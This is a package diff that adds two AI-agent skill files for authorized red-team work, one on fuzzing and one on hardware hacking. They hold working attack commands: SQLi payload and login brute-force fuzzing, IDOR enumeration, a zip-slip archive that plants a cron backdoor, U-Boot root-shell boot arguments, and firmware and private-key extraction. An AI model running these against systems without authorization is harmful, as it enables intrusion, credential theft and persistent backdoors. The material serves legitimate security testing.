rtexit-method 0.1.4 → 0.1.6

package/packaged-assets/.agents/skills/rt-exploit-fuzzing/SKILL.md

@@ -0,0 +1,301 @@
+---
+name: rt-exploit-fuzzing
+description: "Vulnerability discovery through fuzzing for authorized engagements. Web API fuzzing with ffuf and wfuzz, binary fuzzing with AFL++ and LibFuzzer, network protocol fuzzing with Boofuzz, HTTP parameter fuzzing, file format fuzzing, and interpreting crash outputs. Use when searching for unknown vulnerabilities in web applications, custom protocols, or compiled binaries."
+---
+
+# rt-exploit-fuzzing — Fuzzing for Vulnerability Discovery
+
+## Overview
+
+Fuzzing sends malformed, random, or mutated inputs to a target to trigger crashes, errors, or unexpected behavior. It discovers vulnerabilities that manual testing misses — buffer overflows, format string bugs, injection points, and logic errors.
+
+**Fuzzing targets:**
+- Web applications (parameters, headers, paths)
+- REST/GraphQL APIs (field types, lengths, special chars)
+- Network protocols (custom TCP/UDP services)
+- File parsers (images, documents, archives)
+- Compiled binaries (local or remote)
+
+---
+
+## Type 1 — Web Application Fuzzing
+
+### 1a — Parameter Discovery & Value Fuzzing (ffuf)
+
+```bash
+# Install
+apt install ffuf -y
+
+# Fuzz URL path segments
+ffuf -u https://target.com/FUZZ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt \
+  -mc 200,301,302,403 -t 50 -o paths.json
+
+# Fuzz GET parameters
+ffuf -u "https://target.com/api?FUZZ=test" \
+  -w /opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt \
+  -mc 200 -fs 0
+
+# Fuzz parameter values (injection detection)
+ffuf -u "https://target.com/api?id=FUZZ" \
+  -w /opt/SecLists/Fuzzing/SQLi/Generic-SQLi.txt \
+  -mc 200,500 -fr "normal response text"
+
+# Fuzz HTTP headers
+ffuf -u "https://target.com/" -H "X-Custom-Header: FUZZ" \
+  -w /opt/SecLists/Discovery/Web-Content/common-http-headers.txt
+
+# Fuzz JSON body fields
+ffuf -u "https://target.com/api/user" \
+  -X POST -H "Content-Type: application/json" \
+  -d '{"FUZZ":"test"}' \
+  -w /opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt \
+  -mc 200 -fs 0
+
+# Multi-position fuzzing (username + password simultaneously)
+ffuf -u "https://target.com/login" -X POST \
+  -d "username=FUZZ&password=W1" \
+  -w users.txt:FUZZ -w passwords.txt:W1 \
+  -mc 302 -t 10
+```
+
+### 1b — Wfuzz (Advanced Filtering)
+
+```bash
+# Install
+pip3 install wfuzz
+
+# Fuzz with error detection
+wfuzz -c -z file,/opt/SecLists/Fuzzing/special-chars.txt \
+  --hw 10 "https://target.com/search?q=FUZZ"
+# --hw 10: hide responses with 10 words (filter baseline)
+
+# Detect injection points by response size changes
+wfuzz -c -z file,injections.txt \
+  --hh 1234 "https://target.com/api?id=FUZZ"
+# --hh: hide responses with N chars (filter normal size)
+
+# Recursive fuzzing
+wfuzz -c -R 2 -z file,dirs.txt "https://target.com/FUZZ"
+
+# Cookie-based session fuzzing
+wfuzz -c -z file,payloads.txt -b "session=FUZZ" https://target.com/dashboard
+```
+
+---
+
+## Type 2 — API-Specific Fuzzing
+
+```bash
+# GraphQL introspection → fuzz all fields
+# First: discover schema
+python3 clairvoyance.py -o schema.json https://target.com/graphql
+
+# Generate field fuzz list from schema
+python3 -c "
+import json
+with open('schema.json') as f:
+    schema = json.load(f)
+for t in schema.get('types', []):
+    for field in t.get('fields', []) or []:
+        print(field['name'])
+" > graphql_fields.txt
+
+# Fuzz each field value
+ffuf -u "https://target.com/graphql" \
+  -X POST -H "Content-Type: application/json" \
+  -d '{"query":"{ user(id: FUZZ) { id name email } }"}' \
+  -w /opt/SecLists/Fuzzing/Integers/Integers.txt \
+  -mc 200 -mr '"errors"'
+
+# REST API — fuzz IDs for IDOR
+seq 1 10000 | ffuf -u "https://target.com/api/users/FUZZ" \
+  -w - -mc 200 -t 20
+
+# Fuzz request body for mass assignment
+ffuf -u "https://target.com/api/user/update" \
+  -X PUT -H "Content-Type: application/json" \
+  -d '{"FUZZ":"injected"}' \
+  -w /opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt \
+  -mc 200
+```
+
+---
+
+## Type 3 — Binary Fuzzing with AFL++
+
+```bash
+# Install AFL++
+apt install afl++ -y
+# Or from source: github.com/AFLplusplus/AFLplusplus
+
+# Basic fuzzing of a binary that reads from stdin
+mkdir afl_in afl_out
+echo "normal_input" > afl_in/seed1
+
+AFL_SKIP_CPUFREQ=1 afl-fuzz -i afl_in -o afl_out -- ./target_binary @@
+# @@ = AFL replaces with path to mutated input file
+
+# Fuzzing with shared memory (faster)
+afl-fuzz -i afl_in -o afl_out -m none -- ./target_binary
+
+# Fuzzing file parsers (image, PDF, XML)
+echo '<?xml version="1.0"?><root>test</root>' > afl_in/seed.xml
+afl-fuzz -i afl_in -o afl_out -- ./xml_parser @@
+
+# Check crash results
+ls afl_out/crashes/
+# Each file = input that caused a crash
+
+# Minimize and analyze crash
+afl-tmin -i afl_out/crashes/id:000001 -o min_crash -- ./target_binary @@
+gdb ./target_binary --args ./target_binary min_crash
+# bt → backtrace → identify vulnerability type
+```
+
+### 3a — Network Binary Fuzzing (Boofuzz)
+
+```bash
+pip3 install boofuzz
+
+# Basic TCP service fuzzer
+python3 << 'EOF'
+from boofuzz import *
+
+def main():
+    session = Session(target=Target(
+        connection=TCPSocketConnection("TARGET_IP", 9999)
+    ))
+    
+    # Define protocol message structure
+    s_initialize("REQUEST")
+    s_string("GET")          # command
+    s_delim(" ")
+    s_string("FUZZ_TARGET")  # fuzzed field
+    s_delim("\r\n")
+    s_static("\r\n")
+    
+    session.connect(s_get("REQUEST"))
+    session.fuzz()
+
+if __name__ == "__main__":
+    main()
+EOF
+
+python3 fuzzer.py
+# Monitor: http://127.0.0.1:26000  (boofuzz web UI)
+# Crashes logged automatically
+```
+
+---
+
+## Type 4 — File Format Fuzzing
+
+```bash
+# Radamsa — general purpose file mutator
+apt install radamsa -y
+
+# Generate 1000 mutated inputs from valid seed
+radamsa -n 1000 -o mutated_%n.jpg valid_image.jpg
+
+# Feed to target parser
+for f in mutated_*.jpg; do
+  timeout 2 ./image_parser "$f" 2>/dev/null
+  if [ $? -eq 139 ]; then  # 139 = segfault
+    echo "CRASH: $f"
+    cp "$f" crashes/
+  fi
+done
+
+# PDF fuzzing (common in enterprise — email attachments)
+radamsa -n 100 valid.pdf | xargs -I{} -P10 sh -c 'echo {} | timeout 2 pdfparser {}'
+
+# ZIP/Archive fuzzing (path traversal, zip bombs)
+python3 << 'EOF'
+import zipfile, io, random, string
+
+# Zip slip attack: file with ../../etc/passwd in name
+with zipfile.ZipFile("zipslip.zip", "w") as z:
+    z.writestr("../../../tmp/pwned.txt", "pwned")
+    z.writestr("../../../../etc/cron.d/backdoor", "* * * * * root id > /tmp/id")
+EOF
+```
+
+---
+
+## Type 5 — LibFuzzer (In-Process Fuzzing)
+
+```c
+// libfuzzer_target.c — wrap your target function
+#include <stdint.h>
+#include <stddef.h>
+
+// This is the function LibFuzzer will call repeatedly
+int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
+    if (size < 4) return 0;
+    
+    // Call your target function with fuzz data
+    parse_user_input(data, size);
+    return 0;
+}
+```
+
+```bash
+# Compile with sanitizers for crash detection
+clang -fsanitize=fuzzer,address,undefined \
+  libfuzzer_target.c target_library.c \
+  -o fuzz_target
+
+# Run fuzzer
+./fuzz_target corpus/ -max_len=1024 -jobs=4
+
+# Crashes saved automatically as crash-* files
+```
+
+---
+
+## Interpreting Results
+
+```bash
+# Web fuzzing — interesting responses:
+# 500 Internal Server Error = potential injection, exception
+# 200 with much larger/smaller response = different code path
+# Response time spike = potential DoS or sleep-based injection
+
+# Binary fuzzing — crash types:
+# SIGSEGV (11) = segmentation fault → potential buffer overflow
+# SIGABRT (6)  = assertion failed → logic bug
+# Heap buffer overflow → check with AddressSanitizer output
+
+# Triage crashes with GDB
+gdb ./target
+run < crash_input
+bt        # backtrace
+info reg  # register state at crash
+x/20x $rsp  # stack contents
+
+# Check exploitability
+pip3 install exploitable
+gdb -batch -ex "run < crash" -ex "exploitable" ./target
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** ffuf for directory/parameter discovery · Radamsa for file mutation · observe HTTP error codes
+
+**INTERMEDIATE:** AFL++ for binary fuzzing · Boofuzz for network protocols · crash triage with GDB
+
+**ADVANCED:** LibFuzzer with sanitizers · coverage-guided fuzzing · exploit primitive identification from crashes
+
+**EXPERT:** Custom mutators · protocol state machine fuzzing · from crash to working exploit
+
+---
+
+## References
+
+- AFL++: https://github.com/AFLplusplus/AFLplusplus
+- Boofuzz: https://github.com/jtpereyda/boofuzz
+- ffuf: https://github.com/ffuf/ffuf
+- Radamsa: https://gitlab.com/akihe/radamsa
+- MITRE T1190: https://attack.mitre.org/techniques/T1190/

package/packaged-assets/.agents/skills/rt-hardware-hacking/SKILL.md

@@ -0,0 +1,253 @@
+---
+name: rt-hardware-hacking
+description: "Hardware security testing skill for authorized engagements. JTAG/SWD debug port access and firmware extraction, UART console access for root shells, firmware analysis with binwalk and Ghidra, I2C/SPI EEPROM dumping, default credential testing on embedded devices, hardware fault injection (voltage glitching), chip-off NAND flash extraction, and Flipper Zero for RF/NFC/RFID attacks. Use when testing IoT devices, embedded systems, network equipment, or physical security hardware in authorized engagements."
+---
+
+# rt-hardware-hacking — Hardware Security & Embedded Systems
+
+## Overview
+
+Hardware hacking attacks the physical layer of devices — firmware, debug interfaces, and hardware protocols. IoT devices, routers, PLCs, and security hardware often have debug ports enabled, weak firmware protections, and hardcoded credentials.
+
+**Required tools:** Multimeter, UART-USB adapter (CP2102/FTDI), JTAG programmer (J-Link/OpenOCD), logic analyzer, soldering iron, Flipper Zero.
+
+---
+
+## Phase 1 — Physical Interface Discovery
+
+```bash
+# Visual inspection — find debug ports on PCB
+# Look for: 4-pin or 6-pin headers, test pads, labeled silkscreen (UART, JTAG, SWD, DEBUG)
+
+# Common interfaces to look for:
+# UART: 4 pins (VCC, GND, TX, RX) — usually 3.3V serial console
+# JTAG: 20-pin or 10-pin header (TDI, TDO, TCK, TMS, TRST, GND)
+# SWD: 2-pin (SWDIO, SWDCLK) — ARM Cortex debug
+# I2C: 2-wire (SDA, SCL) — connects to EEPROM, sensors
+# SPI: 4-wire (MOSI, MISO, SCK, CS) — flash memory
+```
+
+---
+
+## Phase 2 — UART Console Access
+
+```bash
+# UART = Universal Asynchronous Receiver/Transmitter
+# Often provides: bootloader access, root shell, debug output
+
+# Step 1: Identify UART pins with multimeter
+# VCC: ~3.3V or 5V constant
+# GND: 0V constant
+# TX: Fluctuates 0-3.3V during boot
+# RX: Usually high (3.3V) when idle
+
+# Step 2: Find baud rate
+# Connect logic analyzer to TX pin → capture during boot
+# Use sigrok/PulseView to decode
+# Common rates: 115200, 57600, 38400, 9600
+
+# Step 3: Connect UART-USB adapter
+# Adapter RX → Device TX
+# Adapter TX → Device RX
+# GND → GND (NEVER connect VCC unless powering device)
+
+# Step 4: Connect with minicom/screen
+minicom -D /dev/ttyUSB0 -b 115200
+screen /dev/ttyUSB0 115200
+
+# Common results:
+# U-Boot bootloader prompt: Hit any key to stop autoboot → full access
+# Login prompt: try root/root, admin/admin, root/(blank)
+# BusyBox shell: direct root access
+
+# U-Boot exploitation
+# At "Hit any key" prompt:
+printenv        # See environment variables (contains passwords sometimes)
+setenv bootargs "console=ttyS0,115200 root=/dev/mtdblock2 init=/bin/sh"
+boot            # Boot to root shell
+```
+
+---
+
+## Phase 3 — JTAG Firmware Extraction
+
+```bash
+# JTAG = debug interface for processors
+# Provides: halt CPU, read/write memory, extract firmware
+
+# Connect J-Link or Bus Pirate to JTAG header
+# Pin mapping (20-pin ARM JTAG):
+# 1=VCC, 3=TRST, 5=TDI, 7=TMS, 9=TCK, 11=RTCK, 13=TDO, 15=RESET, 17-19=NC, 2,4,6,8,10,12,14,16,18,20=GND
+
+# OpenOCD — open source JTAG/SWD tool
+apt install openocd -y
+
+# Config for common targets
+openocd -f interface/jlink.cfg -f target/stm32f4x.cfg
+# Or autodetect:
+openocd -f interface/jlink.cfg -c "transport select jtag" -f target/auto.cfg
+
+# In OpenOCD telnet (port 4444):
+telnet localhost 4444
+halt                                    # Stop CPU
+dump_image firmware.bin 0x08000000 0x100000  # Dump flash
+# Address varies by chip: 0x08000000 = STM32 flash start
+
+# Read entire memory map
+mdw 0x08000000 256    # Dump 256 words from address
+```
+
+---
+
+## Phase 4 — SPI/I2C EEPROM Dumping
+
+```bash
+# EEPROM stores: firmware, credentials, certificates, encryption keys
+
+# Identify chip: read markings, look up datasheet
+# Common: Winbond W25Q series (SPI flash), AT24C series (I2C EEPROM)
+
+# Method A: In-circuit with flashrom (SPI)
+flashrom -p serprog:dev=/dev/ttyUSB0:115200 -r firmware.bin
+flashrom -p ch341a_spi -r firmware.bin  # CH341A USB SPI programmer
+flashrom -p linux_spi:dev=/dev/spidev0.0 -r firmware.bin  # Raspberry Pi SPI
+
+# Method B: Chip-off (desolder + read externally)
+# Desolder chip → place in programmer socket → read
+# Programmer: TL866II Plus, T48, or CH341A
+
+# Identify flash layout
+binwalk firmware.bin
+# Output:
+# DECIMAL    HEX        DESCRIPTION
+# 0          0x0        U-Boot bootloader
+# 65536      0x10000    Linux kernel (gzip)
+# 327680     0x50000    Squashfs filesystem
+
+# Extract filesystem
+binwalk -e firmware.bin
+cd _firmware.bin.extracted/
+# Find credentials
+grep -r "password\|passwd\|admin\|root" squashfs-root/etc/
+cat squashfs-root/etc/shadow
+cat squashfs-root/etc/passwd
+
+# Find hardcoded keys/certs
+find squashfs-root/ -name "*.pem" -o -name "*.key" -o -name "*.crt" 2>/dev/null
+```
+
+---
+
+## Phase 5 — Firmware Analysis
+
+```bash
+# After extraction with binwalk
+
+# Find hardcoded credentials
+grep -r "password\|passwd\|secret\|admin" squashfs-root/ --include="*.conf" --include="*.xml"
+strings firmware.bin | grep -E "(admin|root|password)[=:]"
+
+# Extract private keys
+grep -r "BEGIN.*PRIVATE KEY" squashfs-root/
+find squashfs-root/ -name "*.pem" -exec cat {} \;
+
+# Find web interface credentials
+find squashfs-root/ -name "htpasswd" -o -name "*.shadow"
+cat squashfs-root/etc/lighttpd/lighttpd.conf | grep -i "password\|auth"
+
+# Find SSL/TLS private keys (HTTPS decryption)
+find squashfs-root/ -name "server.key" -o -name "ssl.key"
+# Extract → use to decrypt captured HTTPS traffic in Wireshark
+
+# Identify update mechanism (for firmware backdoor)
+grep -r "firmware\|update\|upgrade" squashfs-root/usr/sbin/ 2>/dev/null
+# Look for: unsigned update validation → can flash backdoored firmware
+
+# Emulate firmware with QEMU
+apt install qemu-user-static -y
+file squashfs-root/bin/busybox  # Check architecture (MIPS, ARM, etc.)
+chroot squashfs-root/ /bin/sh  # Emulate if same arch
+# Or: firmadyne for full emulation
+```
+
+---
+
+## Phase 6 — Flipper Zero Attacks
+
+```bash
+# Flipper Zero: Swiss Army knife for hardware/RF attacks
+
+# RFID/NFC Badge Cloning (Physical Access)
+# 125kHz (LF) badges: HID, EM4100 — common in older buildings
+# Flipper: NFC → Read → saves to card file
+# Flipper: NFC → Saved → Emulate → badge reader accepts it
+
+# Common badge protocol reading
+# 13.56MHz (HF): Mifare Classic, NTAG213
+# flipper: NFC → Detect Reader → determine protocol
+# Mifare Classic (many old systems): weak crypto → clone/clone
+
+# Sub-GHz RF attacks
+# Flipper: Sub-GHz → Frequency Analyzer → scan for device transmissions
+# Record and replay: garage doors, parking barriers (rolling code: won't work; fixed code: works)
+# Brute-force: Sub-GHz → Some Attack → try all codes for fixed-code systems
+
+# IR (Infrared) — security cameras, access control panels
+# Flipper: Infrared → Universal Remotes → test all codes
+# Record target remote → replay
+
+# GPIO + UART
+# Connect Flipper GPIO to device UART → use as UART terminal
+# Flipper: GPIO → USB-UART Bridge
+```
+
+---
+
+## Phase 7 — Fault Injection / Voltage Glitching
+
+```bash
+# Brief voltage drop can cause CPU to skip instructions
+# Common target: skip authentication check, disable secure boot
+
+# Concept: drop VCC for ~100ns at precise moment during boot
+# Equipment: ChipWhisperer (professional), Raspberry Pi Pico (DIY)
+
+# ChipWhisperer basic glitch
+import chipwhisperer as cw
+scope = cw.scope()
+scope.glitch.clk_src = "clkgen"
+scope.glitch.output = "glitch_only"
+scope.glitch.trigger_src = "ext_single"
+scope.glitch.width = 5     # Width in cycles
+scope.glitch.offset = -45  # Timing offset
+scope.arm()
+# Trigger → scope fires glitch → observe if auth bypassed
+
+# EMFI (Electromagnetic Fault Injection)
+# Coil near target chip → EM pulse at right moment → same effect as voltage glitch
+# Tools: Riscure EM probe, DIY ferrite core coil
+```
+
+---
+
+## Skill Levels
+
+**BEGINNER:** UART connection + default credentials · binwalk firmware extraction · Flipper Zero for RFID cloning
+
+**INTERMEDIATE:** JTAG/SWD firmware dump with OpenOCD · SPI EEPROM extraction with flashrom · Firmware analysis for credentials
+
+**ADVANCED:** Chip-off extraction + NAND flash reconstruction · U-Boot exploitation · Sub-GHz replay attacks
+
+**EXPERT:** Voltage glitching for secure boot bypass · Custom JTAG scripts for proprietary chips · EMFI attacks
+
+---
+
+## References
+
+- OpenOCD: https://openocd.org
+- flashrom: https://flashrom.org
+- binwalk: https://github.com/ReFirmLabs/binwalk
+- Flipper Zero: https://flipperzero.one
+- ChipWhisperer: https://github.com/newaetech/chipwhisperer
+- OWASP IoT Attack Surface: https://owasp.org/www-project-internet-of-things/
+- MITRE T0862: https://attack.mitre.org/techniques/T0862/